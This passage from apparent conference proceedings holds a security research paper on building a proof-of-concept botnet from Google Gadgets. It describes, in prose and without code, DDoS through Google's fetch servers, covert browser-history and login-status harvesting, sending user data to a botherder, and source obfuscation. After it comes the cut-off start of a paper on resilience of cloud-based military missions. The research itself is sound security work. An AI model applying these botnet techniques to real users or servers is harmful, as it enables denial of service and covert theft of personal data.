seven types of security threats where identified (Hubbard et al., 2010). Of these seven, we focused on<br />

two main attack factors Abuse and nefarious use of cloud computing as well as Insecure interfaces<br />

and APIs.<br />

3.1 Establishing denial of service attack capability<br />

Figure 2: Google Gadget makeRequest() function<br />

The Google Gadget API provides users the capability to load remote content into gadgets by calling,<br />

makeRequest() (Google Gadgets API, 2009). This function is asynchronous and can be called<br />

independent from other JavaScript calls. This is a fairly useful capability as this allows users to easily<br />

create gadget versions of their websites and extend their market reach. This function instructs one of<br />

the servers residing on the Google Gadget Domain to perform an HTTP request on behalf of the<br />

gadget user, as illustrated in Figure 3: makeRequest() HTTP request flow. This implies that the request<br />

source is obfuscated and that only the Google Gadget Server IP address will appear in the remote<br />

server logs. By exploiting this communication structure one can use Google Gadget Servers as Bots<br />

for a Botnet. For the purpose of this Proof of Concept we used Goolge’s makeRequest() function to<br />

send and interpret all command and control messages sent between bots and botherder.<br />

Figure 3: makeRequest() HTTP request flow<br />

According to Google Webmaster Central (2010), Google uses a Feedfetcher user-agent to retrieve<br />

remote content. Google’s Feedfetcher user-agent does not follow the Robots Exclusion Protocol. This<br />

protocol is not mandatory but is meant to protect certain pages from being viewed by web spiders and<br />

crawlers. When asked why Google’s Feedfetch agent does not obey robots.txt, the Google<br />

representative states that the Feedfetcher request is the result of an explicit action by a human user,<br />

and not from automatic crawlers, hence Feedfetcher does not follow robots.txt guidelines. This<br />

response would imply it is not possible to generate fetch requests automatically, yet seeing as Google<br />

gadgets are coded in JavaScript it is a trivial task to automate the fetch requests.<br />

35


Ivan Burke and Renier van Heerden<br />

According to (Google Gadgets API, 2009), Google’s makeRequest() function does not validate the<br />

existence of a page prior to sending the HTTP request to remote server. This would mean malicious<br />

coders can use Google Gadgets to probe websites for config, admin or script files stored in un-listable<br />

directories of web pages. This could also be used to create a large amount of traffic towards the web<br />

server by generating makeRequest() calls for none-existent pages on the server. This type of probing<br />

and traffic generation could also be created by pure JavaScript without the use of Google Gadget’s<br />

makeRequest() function, but the benefit of using Google Gadget API is that the remote server logs will<br />

only contain the IP address of Google Gadget application servers, as illustrated by Figure 4: Remote<br />

server log.<br />

Figure 4: Remote server log<br />

Google provides a cache features for all its gadgets to reduce server loads (Google Gadgets API,<br />

2009). This cache server saves a copy of the remote content on a local server for faster retrieval. By<br />

default Google gadgets get cached for approximately one hour. Due to the requirement of some<br />

gadget developers to have shortened cache timing due to dynamic nature of their gadgets, Google<br />

provided developers with the capability to set the cache interval. According to Google Gadgets API<br />

(2009), it is possible to set the interval to zero seconds. Google Gadget API does not prevent<br />

developers from setting cache interval to zero but warns against setting cache interval to zero as it<br />

might overload remote server.<br />

Thus we have discovered two means of disrupting remote server. Either by generating near infinite<br />

fictitious web pages from a server, or by fetching the same page recursively and setting the refresh<br />

interval to zero seconds.<br />

3.2 Retrieving user data<br />

Clients using the Cloud uses API calls to communicated and execute commands on the Cloud,<br />

through its Service-Orientated Architecture (SOA). In general, cloud computing units are heavily<br />

compartmentalized to insure no data can be leaked between clients. Unfortunately the components<br />

that makeup the Cloud infrastructure, such as CPU, Ram and GPU, where not specifically designed<br />

for isolation. (Hubbard et al., 2010) Techniques to exploit this weakness have been demonstrated by<br />

Joanna Rutkowska (Rutkowska, 2008) and Kostya Kortchinsky (Kortchinsky, 2009). In our specific<br />

case we do not target data on the Cloud specifically we merely use the Cloud as a channel to pass<br />

and receive message.<br />

Google gadget API is a collection of JavaScript libraries; as such they require JavaScript to be<br />

enabled to utilize its capability. JavaScript can be used to determine user browser history and browser<br />

information. Cabri (2007), created a simplistic JavaScript to determine if a page have been visited<br />

before. Figure 5: Sites visited script, contains the script he used. By using this script to look up<br />

banking sites or social media sites one can determine which banking and social media services the<br />

user have visited.<br />

By combining this script with Google gadget makeRequest(), one can determine if the user has auto<br />

login enabled for certain social media sites. For example: to test if the user has auto-logon enabled on<br />

Facebook one can request http://www.facebook.com/home.php. If the content is the home page it<br />

would mean the browser automatically logged the user in or the user has an active Facebook session.<br />

If the login page is returned it would mean the user’s session has expired or that auto-logon is<br />

disabled. Keep in mind that makeRequest() does not display the page, it merely returns its contents to<br />

the callback function specified by the makeRequest() call. This means that the user does not need to<br />

get any visual cues of gadget activity. The Botnet designer can choose whether to scrape the<br />

resulting homepage for more data or to crawl the social network site for more data or to just report the<br />

information back to Botherder for future use.<br />

36


Ivan Burke and Renier van Heerden<br />

Figure 5: Sites visited script<br />

Hashemian (2005), created a PHP script that can be accessed via JavaScript to perform IP resolution<br />

and reverse DNS lookups for visitors to sites. This provides more info on the location and domain<br />

usage of gadget user. Google’s makeRequest() function is also capable of performing a POST<br />

request. By combining these JavaScript information gathering techniques and posting capability of<br />

Google’s makeRequest() one can report back gathered information to Botherder. This is just some of<br />

the data that can be gathered using JavaScript and by no means covers all the data that can be<br />

harvested by JavaScript but for the purposes of this Proof of Concept they are sufficient.<br />

3.3 Adsense abuse<br />

Advertising companies offering website designers money for serving up adverts on their sites. By<br />

requesting pages using makeRequest() one can fool most Impression Based advertising models into<br />

counting the page fetch as an impression hence generating revenue for the website designer. Unique<br />

IP addresses have a higher weight on Advanced Impression Based advertising sites. Because<br />

Google Gadget Application servers make the request, only a select few IP addresses will in effect be<br />

displayed in advertising company logs. Hence, Adsense abuse is not really effective with Google<br />

Gadget API but it does guarantees a steady and constant number of visits to a site.<br />

3.4 Obfuscating source of attack<br />

Thus far it has already been stated that if the Google Feedfetcher is used to fetch remote data only<br />

the Google Gadget Domain Server's IP will be logged in the remote servers access logs. This is<br />

already an attempt to obfuscate the source of the attack. Unfortunately for Google gadgets to work<br />

and to be published Google needs to be able to access the gadget source code. This means that<br />

anyone wishing to add the gadget would also be able to fetch the source code and could possibly<br />

deduce that it executes malicious commands. A simple way of overcoming this obstacle is obfuscate<br />

the source code. By encoding the JavaScript source code in base64. Wang, (2009) developed a web<br />

tool specifically designed to obfuscate JavaScript. Figure 6 illustrates the result of obfuscating the<br />

hasLinkBeenVisited() function.<br />

37


Figure 6: JavaScript obfuscation<br />

3.5 Spreading of botnet<br />

Ivan Burke and Renier van Heerden<br />

Thus far we have illustrated two layers of attack. The DDoS attacks and Adsense abuse described in<br />

previous subsections are targeted towards remote servers or Impression Based advertising<br />

companies, these attacks are in effect performed by the gadget users on behalf of the botherder. The<br />

second layer of attack is the data gathering performed on the actual gadget user.<br />

Attacks on remote server, actually require few gadget users. A botherder can automate mass<br />

amounts of requests from a single gadget user. FeedFetcher was designed distributed on several<br />

machines to improve performance and to cut down on bandwidth Google attempts to make the fetch<br />

request on a machine situated near target remote site. This would mean that the IP would constantly<br />

change and that the physical location of fetching machines can also be varied.<br />

The second layer of attack is more reliant on the gadget itself to spread among users. For the<br />

purpose of this research we merely created several Google accounts and used Google Gadget<br />

sharing capabilities to distribute the gadgets. We will now briefly discuss some of the options available<br />

for spreading of gadgets.<br />

Google Gadget API provides users with the capability of sharing gadgets among a user’s Google<br />

contact list or by sending out emails containing an invite to install the gadget. Google also provide the<br />

capability of publishing the gadget on their Application servers. Published applications can be ranked<br />

and browsed by all iGoogle users. By manipulating the Google ranking system one can increase the<br />

probability of your gadget being added by other users.<br />

Google Gadget API is fully integrated with OpenSocial API. OpenSocial API is a web framework for<br />

developing social applications which are capable of communicating across multiple social media sites.<br />

Peterson (2009), provides some basic steps than can be taken to increase gadget spread.<br />

In the next Section, we will discuss our final Botnet model. We discuss how we mapped all the<br />

techniques described in this Section into our final Proof of Concept model.<br />

4. Botnet gadget<br />

Figure 7: Botnet Gadget illustrates the basic structure of our Botnet gadget. The Botherder acts as a<br />

Gadget developer and uses Google’s services to update the Gadget and by extension update the<br />

Botnet. By doing this the Botherder can have a single point of access to all Bots at the same time.<br />

Updates might include new JavaScript attacks or even new targets for DDoS attack. The Botnet hides<br />

in plain sight as a normal gadget. It could either use a command from the Botherder or a temporal<br />

event to trigger a remote attack and while the Botnet is waiting to commence the next attack the<br />

Gadgets can gather information on Gadgets users and possibly identify other means of<br />

communications or vulnerabilities on Gadget user’s PC.<br />

38


Ivan Burke and Renier van Heerden<br />

Figure 7: Botnet Gadget<br />

In the remainder of this Section we discuss the attacks we added to our PoC Botnet Gadget and we<br />

discuss some of the information obtained by our Botnet Gadget.<br />

We used the JavaScript function provided by Cabri (2007) to extract user history information such<br />

which Social network site the gadget user has visited and which bank he or she uses. Cabri’s (2007)<br />

script can only determine if a site has been visited hence it is an exaustive search, hence we scanned<br />

though a targeted list of URLs for information we were interested in. We used JSON IP Adress<br />

recovery script provided by (Bullock, 2010), to determin gadget user IP Time zone and general<br />

geographical location using the retrieved IP.<br />

Figure 8: Sample of JSON IP recovery script<br />

To determine if the gadget user has auto login for social network sites we create hidden iFrames to try<br />

and access logged in content of social media sites. We queried the iFrame content to determine<br />

whether the iFrame was redirected to Login page or whether it could access the content. This data<br />

along with IP and history data was posted back to our own remote server using Google’s<br />

makeRequest() function.<br />

For a denial of service attack we used one of our own servers and requested fictitious pages from it<br />

using makeRequest() function. We placed fetch request in a n endless loop that generated<br />

39


Ivan Burke and Renier van Heerden<br />

randomized page requests to our server. This approach was not successful as it lead to gadget user<br />

PC to run out of memory. Upon investigation we realized this was caused by Google’s AdSense<br />

triggering upon each remote request. We realized that by slowing the request time one could<br />

effectively use this technique for AdSense abuse but as this was not our goal with this PoC we<br />

deactivated AdSense tracking.<br />

We ran the DDoS attack ten times on our own server. We used a single Google Gadget machine.<br />

Table 1: DDoS results shows that on average 638 requests were executed per second. According to<br />

server logs, eight unique Google domain servers were used to make the remote requests. Based on<br />

this data and data pertaining to a specific target server one can determine the number of Gadget<br />

users required to effectively take down a remote server. Unfortunately there is no fixed number of<br />

Gadget users that is required to disrupt a service. The number required is dependent on server<br />

architecture, request routing and data transferred per request. This PoC just determined the rough<br />

number of request that are possible using Google gadgets.<br />

Table 1: DDoS results<br />

Experiment Time per 1000 requests Requests per second<br />

1 1.376 726.744<br />

2 1.884 530.786<br />

3 1.232 811.688<br />

4 1.473 678.887<br />

5 1.661 602.047<br />

6 1.573 635.768<br />

7 1.589 629.406<br />

8 1.605 623.169<br />

9 1.621 617.055<br />

10 1.637 611.060<br />

Average 1.56495 638.998<br />

5. Future work<br />

This paper, merely wishes to illustrate the ease of generating a potential Botnet using services<br />

provided by Google Gadgets. In actuality the only true exploit was the fact that Google allows users to<br />

use Google servers to fetch remote content. The fact that Google gadgets require JavaScript in order<br />

to run, just facilitate the process of automating the attack.<br />

The whole spectrum of attacks on JavaScript can be used with Google’s services. The ability to<br />

execute code from Google’s computers can lead to other misdirection attacks. Google is not the only<br />

commercial player in the internet cloud space. Similar attacks may be possible from Microsoft, Yahoo<br />

or Amazon services. We aim to investigate this in future research.<br />

In this paper we did not investigate the possibility of AdSense revenue generation. By registering a<br />

impression based advertising mechanism, such as Adgator, one can generate revenue simply by<br />

delaying repetitive fetch requests a Botherder. More complex techniques are proposed by Hansen<br />

(2008) to add Clickthrough or Pay-Per-Click advertising schemes.<br />

The Botnet Gadget suffers from several critical weaknesses. Because the Botnet Gadget relies on<br />

Google Feedfetch agent to make remote requests it can easily be stopped by blocking all requests<br />

from this agent. But this will influence other legitimate FeedFetch agent request from Google reader.<br />

Another potential weakness is that Google gadget source code needs to accessible by Google<br />

Gadget Servers hence if a malicious gadget is detected Google could easily remove the Gadget and<br />

the Botherder would lose all its Bots.<br />

6. Conclusion<br />

In this paper we reiterated the views of Stracener (2008) and Hubbard et al. (2010) that as the<br />

computer user base moves towards cloud computing so to will the security threats. We used<br />

Hubbard’s seven key threat indicators to try and identify possible routes of attack for our research.<br />

40


Ivan Burke and Renier van Heerden<br />

First, we defined the four key components of a Botnet. We then provided examples of how these<br />

components can be mimicked by Cloud services and specifically by Google’s gadget API and how<br />

they match the Cloud security threats identified by Hubbard. The API was capable of reproducing<br />

each of the components functionality, to a limited degree with very little alteration of freely available<br />

web resources.<br />

We combined these components to form a simple but working botnet. Although limited in scope, a<br />

simple DDoS attack was achieved by using Google servers as the attacking computers. The current<br />

botnets concentrate on using personal and corporate computers, but as they are moving into the<br />

cloud computing, the botnets will follow.<br />

We identified several weak points in our current design and identified some possible areas for future<br />

development of Cloud botnet research. This is still a rather new field and as such this paper hopes to<br />

serve as a possible point of reference for future work.<br />

References<br />

Banks, S. & Strytz, M., 2007. Bot armies: an introduction. [Online] SPIE Available at:<br />

http://spie.org/x15000.xml?ArticleID=x15000 [Accessed 10 October 2010].<br />

Bullock, D., 2010. IP Address Geolocation JSON API. [Online] Available at:<br />

http://ipinfodb.com/ip_location_api_json.php [Accessed 8 October 2010].<br />

Cabri, R., 2007. Spyjax - Your browser history is not private! [Online] Available at:<br />

http://www.techtalkz.com/news/Security/Spyjax-Your-browser-history-is-not-private.html [Accessed 7<br />

October 2010].<br />

Denis, B., 2008. Anatomy of the Asprox Botnet. [Online] VeriSign Available at:<br />

http://xylibox.free.fr/AnatomyOfTheASPROXBotnet.pdf [Accessed 30 September 2010].<br />

Engate, 2009. Defending your network from Botnet threat. [Online] Engate Available at:<br />

http://ns1.happynet.com/images/datasheets/Engate_whitepaper.pdf [Accessed 9 October 2010].<br />

Eston, T., 2010. DigiNinja. [Online] Available at: http://www.digininja.org/ [Accessed 5 October 2010].<br />

Felix, F.C., Thorsten, H. & Wicherski, G., 2005. Botnet Tracking: Exploring a Root-Cause Methodology to Prevent<br />

Distributed Denial-of-Service Attacks. Computer Security – ESORICS 2005, 3679, pp.319-15.<br />

Garner, 2008. Gartner Says Cloud Computing Will Be As Influential As E-business. Garner Inc. Stamfort: Garner<br />

Inc.<br />

Google Gadgets API, 2009. Working with Remote Content. [Online] Google Available at:<br />

http://code.google.com/apis/gadgets/docs/remote-content.html [Accessed 7 October 2010].<br />

Google Webmaster Central, 2010. Feedfetcher. [Online] Google Available at: "<br />

http://www.google.com/support/webmasters/bin/answer.py?hl=en&answer=178852 [Accessed 3 October<br />

2010].<br />

Hansen, R. & Stracener, T., 2008. Xploiting Google Gadgets: Gmalware and beyond. [Online] Available at:<br />

http://www.defcon.org/images/defcon-16/dc16-presentations/defcon-16-stracener-hansen.pdf [Accessed 3<br />

October 2010].<br />

Hashemian, R.V., 2005. JavaScript Visitor IP Address and Host Name. [Online] Available at: I:\JavaScript Visitor<br />

IP Address and Host Name.mht [Accessed 3 October 2010].<br />

Hubbard, D. et al., 2010. Top Threats to Cloud Computing V1.0. Cloud Security Alliance.<br />

Kiefer, K.P., 2004. Background on Operation Web Snare. [Online] Available at:<br />

http://www.justice.gov/criminal/fraud/documents/reports/2004/websnare.pdf [Accessed 3 December 2010].<br />

Kortchinsky, K., 2009. Black Hat. [Online] Immunity, Inc. Available at: http://www.blackhat.com/presentations/bhusa-09/KORTCHINSKY/BHUSA09-Kortchinsky-Cloudburst-SLIDES.pdf<br />

[Accessed 16 November 2010].<br />

MacManus, R., 2008. Read Write Web. [Online] Available at:<br />

http://www.readwriteweb.com/archives/survey_48_of_bank_customers_wa.php [Accessed 6 October 2010].<br />

Ollmann, G., 2009. A Botnet by Any Other Name. [Online] Available at:<br />

http://www.securityfocus.com/columnists/501 [Accessed 11 October 2010].<br />

Peterson, V., 2009. Social Design Best Practices. [Online] Available at:<br />

http://wiki.opensocial.org/index.php?title=Social_Design_Best_Practices [Accessed 3 October 2010].<br />

Rutkowska, J., 2008. Black Hat. [Online] Coseinc Available at: http://www.blackhat.com/presentations/bh-usa-<br />

06/BH-US-06-Rutkowska.pdf [Accessed 16 November 2010].<br />

Stracene, T., 2008. Securing Widgets and Gadgets in the Web 2.0 World. [Online] Available at:<br />

http://blog.cenzic.com/public/blog/208285 [Accessed 6 October 2010].<br />

Vamosi, R., 2008. CNET News. [Online] Available at: http://news.cnet.com/8301-10789_3-10040669-57.html<br />

[Accessed 2 October 2010].<br />

Wang, A., 2009. Javascript Obfuscator . [Online] Available at: http://www.javascriptobfuscator.com/Default.aspx<br />

[Accessed 12 October 2010].<br />

41


Mission Resilience in Cloud Computing: A Biologically<br />

Inspired Approach<br />

Marco Carvalho 1 , Dipankar Dasgupta 2 , Michael Grimaila 3 and Carlos Perez 1<br />

1<br />

Florida Institute for Human and Machine Cognition, Pensacola, USA<br />

2<br />

University of Memphis, USA<br />

3<br />

Air Force Institute of Technology, Wright-Patterson AFB, USA<br />

mcarvalho@ihmc.us<br />

ddasgupt@memphis.edu<br />

michael.grimaila@afit.edu<br />

cperez@ihmc.us<br />

Abstract: With the continuously improving capabilities enabling distributed computing, redundancy and diversity<br />

of services, Cloud environments are becoming increasingly more attractive for missioncritical and military<br />

operations. In such environments, mission assurance and survivability are key enabling factors for deployment,<br />

and must be provided as an intrinsic capability of the environment. Mission-critical frameworks must be safe and<br />

resistant to localized service failures and compromises. Furthermore, they must be able to autonomously learn<br />

and adapt to the environmental challenges and mission requirements. In this paper, we present a biologically<br />

inspired approach to mission survivability in cloud computing environments. Our approach introduces a multilayer<br />

infrastructure that implements threat detection and service failure coupled with distributed assessments of<br />

mission risks, automated re-organization, and re-planning capabilities. Our approach leverages some insights<br />

from developmental biology at the service orchestration level, and takes failures and risk estimations as<br />

weighting functions for resource allocation. The paper first introduces and formulates the proposed concept for a<br />

simple single mission environment. We then propose a simulated scenario for proof-of concept demonstration<br />

and preliminary evaluation, and conclude paper with a brief discussion of<br />

results and future work.<br />

Keywords: mission assurance, cloud computing, mission survivability, biologically-inspired<br />

resilience<br />

1. Introduction<br />

Mission survivability is recognized as the capacity to maintain the execution, and ensure successful<br />

completion of mission-critical systems, even under localized failures and attacks. In<br />

resourceconstrained environments, mission survivability includes the prioritization of services and<br />

capabilities to maintain mission goals. Previous research efforts on Mission Assurance have focused<br />

on the estimation of effects caused by localized failures (or attacks) to the mission and the design of<br />

robust plans for impact minimization. These are challenging and important capabilities that rely on a<br />

mapping of mission tasks to associated components and their corresponding interdependencies.<br />

They generally provide mechanism for the online evaluation of mission impact, for human<br />

intervention. There is a need to combine these capabilities with self-managing and resilient mission<br />

critical frameworks. In the context of this work, a resilient mission-critical infrastructure is defined as a<br />

computational and communications infrastructure capable to maintain a successful mission execution<br />

(mission survivability) and to remain mission capable under localized disruptions, which normally<br />

requires the capacity to detect, identify, and recover from previous attacks.<br />

More generally, an idealized resilient infrastructure must be able to seamlessly absorb local failures or<br />

attacks with no immediate impact to the mission, while also isolating and recovering from the problem<br />

in order to maintain its capacity to effectively execute subsequent missions. They are expected to be<br />

robust and adaptive infrastructures, capable to learn from experience, and improve their own<br />

performance and survivability.<br />

The challenge is that most mission-critical systems have been traditionally designed for cost efficiency<br />

and performance, with little room from component redundancy and diversity (Cohen,<br />

2005).Furthermore, they generally rely on fixed architectures and configurations, favoring<br />

predictability and control, often in lieu of self-management and run-time adaptability. However, in the<br />

recent years, the computational landscape for mission critical systems has changed significantly with<br />

the increasing acceptance of service oriented architectures as a new design paradigm for systems<br />

design, and the introduction of cloud computational environments to provide large scale, low-cost and<br />

agile commodity computing and storage capabilities. The prospect of highly redundant and adaptive<br />

42


Marco Carvalho et al.<br />

systems starts to become reality, as new adopters begin to leverage the capabilities of these<br />

combined technologies for high-end systems development.<br />

Following several industry initiatives, the United States (US) Government begins to consider the new<br />

landscape. For example the Central Intelligence Agency (CIA) has recently reported it is investing in<br />

cloud analytics, cloud widgets and services, cloud security-as-a-service, cloud enterprise data<br />

management and cloud infrastructure, using commercial IT technologies to analyze multi-lingual data,<br />

audio, Twitter tweets, video and text messages that add layers of complexity to intelligence gathering<br />

(Yasin, 2010).<br />

When properly managed and coordinated, the new environment provides the means and tools for<br />

large-scale distributed systems development, including on-demand resource allocation, dynamic<br />

resource management, diversity in services and capabilities, intrinsic replication for data recovery and<br />

several other capabilities. The challenge, however, is to coordinate all these powerful features in<br />

order to enable resilient mission-critical systems.<br />

In this paper we introduce an organic approach to mission resilience in large-scale and adaptive<br />

computational environments. In particular, we focus on the issues of mission continuity and<br />

survivability in response to attacks, as well as runtime system management and adaptation. In section<br />

2 we briefly discuss the proposed challenges and requirements of mission critical systems for SOA<br />

and cloud environments, as well as some background discussions on service discovery and<br />

orchestration. In section 3 we introduce our biologically-inspired approach on organic resilience for<br />

mission-critical systems, followed by some preliminary discussions on the proposed ideas, and<br />

conclusions.<br />

2. Mission critical systems in the cloud<br />

As previously defined, the goal of resilient mission critical systems is to ensure the successful<br />

execution and completion of the mission while remaining mission-capable in response to localized<br />

failures and attacks. In the context of this work we are primarily concerned with the availability and<br />

integrity aspects of the problem. While data exfiltration and privacy are important and challenging<br />

issues in the cloud environments, they are not considered in the scope of this work. We are primarily<br />

concerned with attacks or failures that may directly disrupt the mission. While there are multiple ways<br />

to describe and represent a mission we will consider that a mission can be represented as a set of<br />

workflows, or a set of strictly ordered sequences of tasks, as illustrated in Figure 1.<br />

In this example, a mission is composed as a set of workflows. Each workflow is composed by a set of<br />

ordered tasks and may represent, for instance, a set of image processing steps to be performed on<br />

imagery collected by surveillance aerial vehicles. Each processing step, represented by the task (A,<br />

F, G, and A) must be performed in strict order, and services 1, 4 and 7 have been tasked to jointly<br />

execute the workflow. It is important to note that service selection in this example may refer to the<br />

orchestration of services provided by a supporting Service Oriented Architecture (SOA) in the cloud.<br />

Figure 1: Distributed execution of a mission represented as a set of workflows<br />

43


Marco Carvalho et al.<br />

In Figure 1, mission success requires a minimum rate of images being successfully processed by the<br />

system. Failures or delays of any of the services engaged in the allocation will likely disrupt the<br />

execution of a workflow (i.e. the processing of one image, in this example) and eventually<br />

compromise the mission.<br />

One of the main benefits provided by a cloud-computing environment (and supporting serviceoriented<br />

capabilities) is the availability of resources that can be quickly engaged for service execution and<br />

released when no longer needed. They also enable the availability of multiple configurations and<br />

implementations for the same type of service (diversity) potentially provided by supporting Service<br />

Oriented Architectures or Software-as-a-Service (SaaS) architectures is also critically important for<br />

resilient mission execution. Combined, these capabilities can be leveraged to:<br />

Enable a dynamic, elastic and automated computing framework for mission execution. This<br />

capability enables mission-critical systems to dynamically balance resource allocation based on<br />

operational context and mission requirements, without building massive amounts of idle<br />

overcapacity.<br />

They enable the parallel execution of critical tasks on demand, over heterogeneous software (and<br />

emulated hardware) systems.<br />

The process of identifying and organizing the services for the task execution (services 1, 4 and 7) is<br />

our example requires a discovery mechanism and an orchestration process, which may be centralized<br />

or distributed. In most cases, the discovery and orchestration of services are based on protocols<br />

defined for Service Oriented Architectures operating over cloud computing environments. They often<br />

take place before mission execution, and remains fixed until a failure is detected or the mission is<br />

completed. In the following items, we will provide a brief review of conventional discovery and<br />

orchestration protocols often used in SOAs.<br />

2.1 Service discovery in cloud environments<br />

There are two aspects involved in service discovery on cloud-enabled frameworks: the identification<br />

of services capable to accomplish a given task, and the identification of computational resources for<br />

executing the service. The first problem is often addressed by conventional service discovery<br />

algorithms for service oriented architectures or software-as-a-service (SaaS) running on cloud<br />

environments. The second part of the problem is generally provided as part of the cloud infrastructure<br />

itself.<br />

The discovery of cloud resources enables load dynamic load balancing and scalability by dynamically<br />

moving services and processes running in the cloud. Most cloud resource allocation services offer<br />

either a centralized or hierarchical approach to this problem, but some authors have also propose<br />

P2P strategies based on Distributed Hash Tables for resource management (Ranjan, 2010). As for<br />

service discovery, service developers often rely on different types of SOA service discovery,<br />

recognizing that some SOA-based services rely on capabilities (e.g. multicast-based discovery) not<br />

necessarily supported by some environments.<br />

One of the earliest service discovery mechanisms available in web service environments was the<br />

Universal Description, Discovery and Integration (UDDI) (Oasis, 2002). UDDI provided a<br />

registrybased approach to service discovery. The approach didn’t gain strong adoption from Industry<br />

as IBM, Microsoft, and SAP closed their public UDDI registries, and Microsoft moved UDDI services<br />

from Windows Server to their services orchestration product called Biztalk. It is possible that UDDI<br />

might still be used inside organizations to dynamically find services within smaller domains, but the<br />

workgroup defining the standard completed their work in 2007. WS-Discovery (Oasis, 2009) provides<br />

an alternative way to service discovery. WS-Discovery is a multicast discovery protocol reducing the<br />

need for a centralized registry. The communication is mainly done using SOAP over UDP. WS-<br />

Discovery has found a niche amongst the network device builders. But its adoption in cloud<br />

environments is limited due to constraints in multicast traffic often imposed in cloud environments.<br />

Another discovery method that has been gaining attention is the DNS-based discovery. Zeroconf, the<br />

protocol implemented by Apple's Bonjour for service discovery, uses DNS and multicast DNS for<br />

service discovery.<br />

One of the next challenges in service discovery is to enable semantic queries (Papazoglou, 2008),<br />

which involves adding semantic annotations and descriptions of QoS characteristics (Klusch, 2006;<br />

44


Marco Carvalho et al.<br />

Benatallah, 2003; Lord, 2005). In 2007, the W3C published a recommendation for Semantic<br />

Annotations for WSDL (W3C, 2007) with limited adoption so far.<br />

2.2 Service orchestration in cloud environments<br />

Service Orchestration generally refers to the composition of modular services to execute a task. The<br />

selection of a service is generally based on interface and capability descriptions. A lot of effort in<br />

service orchestration is focused on tools and languages for service and interface descriptions such as<br />

the Business Process Execution Language (BPEL) and its web-services variation (WS-BPEL). In<br />

most cases, service orchestration is provided by centralized services such as Microsoft’s BizTalk<br />

(Microsoft, 2010) amongst others. There are, however, some research efforts to enable peer-to-peer<br />

orchestration (Bradley, 2004). While centralized approaches to service orchestration are generally<br />

more effective to create complex service structure, they represent a single point of failure in the<br />

process which is undesirable for mission-critical systems. They also require an external correction to<br />

localized failures, which implies that service wide disruptions must be perceived to trigger a<br />

reconfiguration of the service composition. A decentralized strategy for service orchestration, on the<br />

other hand, enables a more robust and emergent approach to the problem. They are generally unable<br />

to provide the same determinism and time guarantees of centralized approaches but if properly<br />

implemented they are better suited to address localized failures and disruptions.<br />

3. Organic computing for mission resilience<br />

In this paper we propose a multi-layer approach to system resilience that builds upon peer-to-peer<br />

discovery and orchestration strategies for mission management. Our approach builds upon previous<br />

research on resilient tactical infrastructures (Carvalho, 2010). It is biologically inspired in the sense<br />

that we combine insights from developmental biology, diversity and immunology, including<br />

inflammatory and immunization systems. In our formulation these biological traits are desirable<br />

capabilities that can be implemented in multiple ways by leveraging services and features enabled by<br />

cloud computing and our own support services. An illustrative view of the proposed architecture is<br />

shown in Figure 2. The service and resource management capabilities illustrated in the lower part of<br />

the figure are provided by the cloud computing and SOA (or SaaS) support services. The organic<br />

defense framework is implemented as the three upper layers in the system.<br />

Figure 2: Proposed multi-layer defense architecture<br />

For the purposes of the organic defense framework, the resource management and service<br />

management capabilities provide the mechanisms necessary for service response and adaptation.<br />

The organic defense infrastructure builds upon three supporting capabilities:<br />

Nodes and services are capable to identify a localized failure or attack. This assumption is based<br />

on the fact that nodes engaged in mission-critical applications are frequently interacting with their<br />

45


Marco Carvalho et al.<br />

neighbors, which allows them to either self-evaluate and identify a failure or a degradation in<br />

performance, or to be notified by its peers of a performance problem.<br />

The defense infrastructure must be able to re-allocate mission critical services to other<br />

(functionally equivalent) services and resources in the system. This capability enables a quick<br />

response to local disruptions and attacks, mitigating their immediate impact to the mission.<br />

The defense layer must be able to replace a service (i.e. shutdown a compromised service and<br />

instantiate a new one) with a copy that is functionally equivalent but with different implementation,<br />

this capability enables the system recover recently lost capabilities, and to diversify its<br />

configuration in order to develop resiliency and eventually immunity against the attack.<br />

Combined, these capabilities enable the multi-layer response infrastructure illustrated in Figure 2. The<br />

first (lower) layer manages the dynamic allocation of resources for mission execution. The second<br />

layer is responsible for the identification, response and potential immunization to localized damages<br />

(i.e. failures or attacks) detected and reported by the first layer. The identification process consists on<br />

correlating the damage with the characteristics and configuration of the effected node. The response<br />

mechanism may include the quarantine, termination or re-initialization of the affected node. The<br />

immunization mechanism provided by the second layer includes the creation of functionally similar<br />

nodes with different software configurations (diversity).<br />

In parallel, the third (and higher) layer coordinates the sharing of information about the attack,<br />

ensuring that a collective response (if appropriate) can be enforced, and that nodes that are<br />

functionally similar to the victim can be reconfigured to prevent a similar attack. A collective response<br />

to an attack may include, for instance, modifications in routing weights to disfavor the use of nodes<br />

that may have been compromised. While simultaneously supported and coordinated, the proposed<br />

defense infrastructure must be loosely couple to prevent a cascade failure in the event that one of the<br />

components becomes temporarily impaired or permanently compromised. As conceived, the<br />

coordinated operation of all three components is necessary to enable a comprehensive response and<br />

system resilience, each component will also operate independently with limited performance gains,<br />

ensuring a graceful degradation of the survivability infrastructure itself.<br />

3.1 Damage detection<br />

One of the assumptions of our approach is that individual services are capable to monitor their own<br />

sensors and performance to detect local damages. In practice, damage detection may be<br />

implemented in multiple ways. In the context of mission continuity, damage is directly related to the<br />

inability of a service to execute its tasks, or a significant degradation in task execution performance<br />

(below acceptable QoS requirements). From that perspective, there is no distictions from damage<br />

caused by localized failures or malicious acts. The effects of both events will be similar, as well as the<br />

way in which the system will respond.<br />

Other approaches for damage detection have also included statistical and biologically inspired<br />

techniques based on Danger Theory (Yuan, 2009), and Artificial Immune Systems (Dasgupta, 2002;<br />

Liang, 2006) amongst others. In most cases damage is based on negative signature matching or<br />

anomaly detections associated with misbehavior s or performance degradations. Upon damage<br />

detection the system will immediately notify the upper layers (for resource management and<br />

response/immunization), while in parallel trying to identify correlated features that could be linked<br />

(maybe causally) to the event. Previous research efforts have been proposed for that, including the<br />

application of Hidden Markov Models (Cho and Park, 2003; Ourston, Matzner, Stump and Hopkins,<br />

2003), decision trees (Li and Ye, 2001; Abbes, Bouhoula, and Rusinowitch, 2004), and others.<br />

3.2 Resource management for mission continuity<br />

Automatic resource and service re-allocation in response to localized failures is common practice in<br />

Grid environments, and has also been previously proposed for enterprise (Lardieri et al, 2007) and<br />

tactical (Carvalho et al, 2005) environments. However, in general, a change in allocation strategy<br />

happens only when degradation (or failure) has taken place and the impact on the mission has been<br />

noted, there's generally no predictive re-allocation based on increased risk of an attack or failure,<br />

learned at runtime from novel attacks.<br />

Our proposed approach leverages and extends such dynamic allocation strategies to enable the<br />

proactive task reallocation, based on online risk estimations. For our current proof-of-concept mission<br />

46


Marco Carvalho et al.<br />

management layer implementation, we have adopted a greedy distributed coordination algorithm<br />

